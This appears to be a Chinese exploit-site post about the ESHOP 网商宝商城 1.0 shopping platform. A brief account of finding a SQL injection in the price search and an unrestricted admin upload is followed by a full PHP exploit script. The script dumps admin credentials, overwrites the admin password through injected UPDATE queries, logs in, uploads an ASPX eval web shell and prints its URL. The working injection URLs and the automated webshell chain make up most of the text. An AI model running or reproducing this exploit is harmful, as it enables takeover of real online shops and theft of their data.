ESHOP 网商宝商城 1.0 GetWebshell Exploit

作者：hack1990 时间：12-04-26 阅读数：574人阅读

某天起床比较晚，起来发现地上有传单。

看了下是个网店。

于是想看看用的什么程序，找了下（看html注释,css注释，文件名）。发现是ESHOP网商宝商城。

google下漏洞，发现有eshop的漏洞，测试了下，不对啊。不过还是报错了。结果发现有其他的网店系统叫ESHOP。

放了两天，然后想起了再来测试下注入，它有过滤代码的。下了源码看了下。结果没有过滤select关键字。

在前台搜索处，价格从到哪里发现一处数字型注入点。

结合代码里找到的管理员表名和列名。然后就可以爆了。

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 admin from admin)>0

// 第一个管理员的登录名

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 password from admin)>0

//密码。标准md5的，大家懂的。

放注入的地方还没有过滤update。所以密码反查不出来，可以更新哦。还有一点，这个过滤代码只过滤了get方式的。

进入后台后。产品系统-》产品内容-》列表图片哪里可以直接传aspx文件。关于路径，直接传aspx不能显示路径，所以先直接传jpg的把路径搞到手，再传aspx的就KO了。

打完收工。

PS:监测而已，不搞破坏的。

<?php
print_r('
+—————————————————————————+
ESHOP 网商宝商城 1.0 GetWebshell Exploit    By: vccjis[S.Y.C]
Team : Www.MyClover.Org Www.InsiGht-Labs.org
Data : 2012.4.22
+—————————————————————————+
'."\r\n");
if ($argc < 3)
{
print_r('
+++++++++++++++++++++++++++++++++++++++++++++++++++++

Usage: php '.$argv[0].' Host Port Path
Example:
php '.$argv[0].' localhost 80 /

+++++++++++++++++++++++++++++++++++++++++++++++++++++
');
exit();
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];

$content = "xxoo";
$cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
$type = "Content-Type: application/x-www-form-urlencoded";

if ($argc == 5)
{
  if ($argv[4] == "god")
  {
   echo "update adminname and password\n\r";
   $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20real_name=admin%2bpassword%20where%20Id=1; HTTP/1.1';
   $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
   $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20admin=0x61646D696E,password=0x6531306164633339343962613539616262653536653035376632306638383365%20where%20Id=1; HTTP/1.1';
   $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
   echo "!!!\r\n";
   echo "go /manager the get webshell\r\n";
   echo "the product content》add a list of pictures》to upload the aspx file\r\n";
   echo "it is necessary the original account password recovery, account password in the admin table real_name field.\r\n";
   echo "adminname:admin\r\n";
   echo "password:123456\r\n";
   exit();
  }
}

$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20and%20(select%20top%201%20admin%20from%20admin)%3E0 HTTP/1.1';
$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
$tempdata = "";

if (preg_match("/\'.*\'/", $recvdata, $tempdata) == 0)
{
echo "\r\nget adminname error";
exit();
}
$adminname = str_replace('\'', '', $tempdata[0]);

$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20and%20(select%20top%201%20password%20from%20admin)%3E0 HTTP/1.1';
$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
$tempdata = "";
preg_match("/\'.*\'/", $recvdata, $tempdata);
$password = str_replace('\'', '', $tempdata[0]);

echo "adminname:".$adminname."\r\n";
echo "adminpass:".$password."\r\n";

$hexadminname = SetToHexString($adminname);
$hexpassword = SetToHexString($password);

$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x6531306164633339343962613539616262653536653035376632306638383365%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
SendData($host, $port, $url, $content, $cookie, $type);

$url = "GET ".$path."/back-login.aspx HTTP/1.1";
$recvdata = SendData($host, $port, $url, $content, $cookie, $type);
$tempdata = "";
$VIEWSTATE = "";
$EVENTVALIDATION = "";

if (preg_match("/__VIEWSTATE\" va.*\" \/>/", $recvdata, $tempdata) == 0)
{
echo "\r\nlogin error";
exit();
}
preg_match("/\/.*\"/", $tempdata[0], $VIEWSTATE);
$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);

$tempdata = "";
preg_match("/__EVENTVALIDATION\" va.*\" \/>/", $recvdata, $tempdata);
preg_match("/\/.*\"/", $tempdata[0], $EVENTVALIDATION);
$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);

$tempdate = "";
preg_match("/ASP.NET_SessionId.*;/", $recvdata, $tempdata);
$cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";

$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=admin&txtPassword=123456&button=%C2%A0%C2%A0\r\n";
$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=".$adminname."&txtPassword=123456&button=%C2%A0dfg%C2%A0\r\n\r\n";
$url = "POST ".$path."/back-login.aspx HTTP/1.1";
$recvdata = SendData($host, $port, $url, $content, $cookie, $type);

$tempdata = "";
if (preg_match("/Cookie:.*;/", $recvdata, $tempdata) == 0)
{
  echo "\r\nlogin error";
  exit();
}

$cookie = $tempdata[0]." ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
$recvdata = SendData($host, $port, "GET ".$path."/manager/product_detail.aspx HTTP/1.1", "", $cookie, $type);
$tempdata = "";
$VIEWSTATE = "";
$EVENTVALIDATION = "";
if (preg_match("/__VIEWSTATE\" va.*\" \/>/", $recvdata, $tempdata) == 0)
{
  echo "\r\nNo /manager";
  exit();
}
preg_match("/\/.*\"/", $tempdata[0], $VIEWSTATE);
$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);

$tempdata = "";
preg_match("/__EVENTVALIDATION\" va.*\" \/>/", $recvdata, $tempdata);
preg_match("/\/.*\"/", $tempdata[0], $EVENTVALIDATION);
$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);

$content = '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTTARGET"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTARGUMENT"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__LASTFOCUS"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__VIEWSTATE"

';
$content .= $VIEWSTATE[0]."\r\n";///wEPDwUJODI1MTc5NTgyD2QWAmYPZBYMAgMPFgIeBFRleHQFEDIwMTItMDQtMjIgMTE6NTFkAgUPFgIfAAUP6LaF57qn566h55CG5ZGYZAIHDxYCHwAFDuaCqOWlve+8mmFkbWluZAIJDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQMHcHJvZHVjdAdwcm9kdWN0DOS6p+WTgeezu+e7n2QCAQ9kFgJmDxUDB2FydGljbGUHYXJ0aWNsZQzmlofnq6Dns7vnu59kAgIPZBYCZg8VAwVvcmRlcgVvcmRlcgzorqLljZXns7vnu59kAgMPZBYCZg8VAwZtZW1iZXIGbWVtYmVyDOS8muWRmOeuoeeQhmQCBA9kFgJmDxUDBnN5c3RlbQZzeXN0ZW0M57O757uf566h55CGZAILDxYCHwECBRYKZg9kFgRmDxUBB3Byb2R1Y3RkAgEPFgIfAQIFFgpmD2QWAmYPFQMQcHJvZHVjdF9jYXRlZ29yeRBwcm9kdWN0X2NhdGVnb3J5DOS6p+WTgeebruW9lWQCAQ9kFgJmDxUDEmNhdGVnb3J5X2F0dHJpYnV0ZRJjYXRlZ29yeV9hdHRyaWJ1dGUM55uu5b2V5bGe5oCnZAICD2QWAmYPFQMPcHJvZHVjdF9jb250ZW50D3Byb2R1Y3RfY29udGVudAzkuqflk4HlhoXlrrlkAgMPZBYCZg8VAw1wcm9kdWN0X2JyYW5kDXByb2R1Y3RfYnJhbmQM5Lqn5ZOB5ZOB54mMZAIED2QWAmYPFQMPcHJvZHVjdF9jb21tZW50D3Byb2R1Y3RfY29tbWVudAzkuqflk4Hor4TorrpkAgEPZBYEZg8VAQdhcnRpY2xlZAIBDxYCHwECCBYQZg9kFgJmDxUDBG5ld3MEbmV3cwzmlrDpl7vliqjmgIFkAgEPZBYCZg8VAwRoZWxwBGhlbHAM5Zyo57q/5biu5YqpZAICD2QWAmYPFQMQd2Vic2l0ZV9zaXRlcG9zdBB3ZWJzaXRlX3NpdGVwb3N0DOe9keermeWFrOWRimQCAw9kFgJmDxUDDnNlY3JldF9wcm90ZWN0DnNlY3JldF9wcm90ZWN0DOmakOengeS/neaKpGQCBA9kFgJmDxUDDWxhd19zdGF0ZW1lbnQNbGF3X3N0YXRlbWVudBLmlL/nrZbms5Xlvovlo7DmmI5kAgUPZBYCZg8VAwdyZWNydWl0B3JlY3J1aXQM5Zyo57q/5oub6IGYZAIGD2QWAmYPFQMSaW50ZWdyYXRlX3B1cmNoYXNlEmludGVncmF0ZV9wdXJjaGFzZQzlm6LotK3kuJPljLpkAgcPZBYCZg8VAwxuZXdzX3JlY3ljbGUMbmV3c19yZWN5Y2xlCeWbnuaUtuermWQCAg9kFgRmDxUBBW9yZGVyZAIBDxYCHwECBRYKZg9kFgJmDxUDBW9yZGVyBW9yZGVyBuiuouWNlWQCAQ9kFgJmDxUDD3Nob3BwaW5nX21ldGhvZA9zaG9wcGluZ19tZXRob2QM6YCB6LSn5pa55byPZAICD2QWAmYPFQMOcGF5bWVudF9tZXRob2QOcGF5bWVudF9tZXRob2QM5LuY5qy+5pa55byPZAIDD2QWAmYPFQMNc2hvcHBpbmdfZGF0ZQ1zaG9wcGluZ19kYXRlDOmAgei0p+aXtumXtGQCBA9kFgJmDxUDDG9yZGVyX3N0YXR1cwxvcmRlcl9zdGF0dXMM6K6i5Y2V54q25oCBZAIDD2QWBGYPFQEGbWVtYmVyZAIBDxYCHwECBBYIZg9kFgJmDxUDC21lbWJlcl9pbmZvC21lbWJlcl9pbmZvDOS8muWRmOeuoeeQhmQCAQ9kFgJmDxUDDG1lbWJlcl9sZXZlbAxtZW1iZXJfbGV2ZWwM5Lya5ZGY57qn5YirZAICD2QWAmYPFQMOb25saW5lX21lc3NhZ2UOb25saW5lX21lc3NhZ2UM5Zyo57q/5Y+N6aaIZAIDD2QWAmYPFQMIZmF2b3JpdGUIZmF2b3JpdGUJ5pS26JeP5aS5ZAIED2QWBGYPFQEGc3lzdGVtZAIBDxYCHwECAhYEZg9kFgJmDxUDCmFkbWluX2xpc3QKYWRtaW5fbGlzdAznrqHnkIbnmbvlvZVkAgEPZBYCZg8VAwRyb2xlBHJvbGUM6KeS6Imy566h55CGZAIND2QWAmYPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGEWEGYPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwNoZGQCBA8PFgIfA2hkZAIKDxBkEBUGDS0t6K+36YCJ5oupLS0P5b+D55CG5YGl5bq357G7CeWwj+ivtOexuw/ouqvkvZPkv53lgaXnsbsP5oiQ6ZW/5Yqx5b+X57G7D+Wls+aAp+ivu+eJqeexuxUGATABMQEyATMBNAE1FCsDBmdnZ2dnZxYBZmQCCw8QZGQWAWZkAiQPDxYCHwNoZGQCJw8PFgIfA2hkZAIoDw8WAh8DaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGNoa0lzU2hvdwUoY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc1JlY29tbWVudAUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc0NvbW1lbnQFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNIb3QFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNOZXcFJ2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNEaXNjb3VudAUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc0RlZmF1bHRMDeHTq5UFawIyhVsczTwNYNAfyw==
$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTVALIDATION"

';
$content .= $EVENTVALIDATION[0]."\r\n";///wEWJwKs5v06Atqk0q0LAqiR6t4KAp6y8rMBAqKKxtACAsHKosgDAruSn4INAvvs89EPAoim8JICApjJ2vwOAofJ2vwOAobJ2vwOAoXJ2vwOAoTJ2vwOAoPJ2vwOAsWeztoBAtXx5LQNAvLf/5UFAvbTvuwMAqP8+4wOArWL1rkIArOYgK0OAuT2yp4BAtr2xvsMAqjJ1JIOApmbyKgEAu27qeUIAp7KhdUMAt/A1eoLAorU36cKAqyP95gBAvPv2FMCo5i5SQKW9+GSCQLKz7OlDALtheC3DwK87PLABgKokaLfCgKesorLBNFtpcfh8T+rQvlfSsD5CYiQmB8C
$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtProductName"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtOrderBy"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtStock"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSaleNumber"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlSecondCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlThirdCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlBrand"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsShow"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsComment"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsNew"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtPrice"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSalePrice"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtIntegral"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImage"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImageId"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuUploadList"; filename="asd.aspx"
Content-Type: application/octet-stream

<%'."@".' Page Language="Jscript"%><%eval(Request.Item["fun"],"unsafe");%>
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$btnUploadList"

......
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailImage"; filename=""

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailZoomImage"; filename=""

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtKeywords"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSummary"

------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtContent"

------------EwwmsGcmNCcEdWawAUBSNx--';

$type = "Content-Type: multipart/form-data; boundary=----------EwwmsGcmNCcEdWawAUBSNx";//"Content-Type: multipart/form-data; boundary=----------FhmN6QFkeZCWDWoYR7K01F";
$recvdata = SendData($host, $port, "POST ".$path."/manager/product_detail.aspx HTTP/1.1", $content, $cookie, $type);
$tempdata = "";
preg_match("/upload-file\/images\/product.*\.aspx/", $recvdata, $tempdata);
$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x'.$hexpassword.'%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
SendData($host, $port, $url, $content, $cookie, $type);

echo "\r\nwebshell:http://$host/".$tempdata[0]."\r\n";

function SendData($host, $port, $url, $content, $cookie, $type)
{
$data = $url."\r\n";
$data .= "Referer: http://$host/\r\n";
$data .= $type."\r\n";
$data .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$data .= "User-Agent: Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.10.229 Version/11.62\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n";
$data .= "Accept-Encoding: gzip, deflate\r\n";
$data .= "Connection: Close\r\n";
$data .= $cookie."\r\n\r\n";
$data .= $content;
$ock=fsockopen($host,$port);
if (!$ock)
{
  echo "No response from host\n";
}
fwrite($ock,$data);
$recvdata = "";
while (!feof($ock))
{
  $exp=fgets($ock, 1024);
  $recvdata .= $exp;
}
fclose($ock);
return $recvdata;
}
function SingleDecToHex($dec)
{
    $tmp="";
    $dec=$dec%16;
    if($dec<10)
        return $tmp.$dec;
    $arr=array("a","b","c","d","e","f");
    return $tmp.$arr[$dec-10];
}

function SetToHexString($str)
{
    if(!$str)return false;
    $tmp="";
    for($i=0;$i<strlen($str);$i++)
    {
        $ord=ord($str[$i]);
        $tmp.=SingleDecToHex(($ord-$ord%16)/16);
        $tmp.=SingleDecToHex($ord%16);
    }
    return $tmp;
}
?>

# Nmap Security Scanner 7.0

上一篇：杰奇CMS (<=1.7) SQL注入漏洞

下一篇：PageAdmin XSS 漏洞

ESHOP 网商宝商城 1.0 GetWebshell Exploit

相关文章

发表评论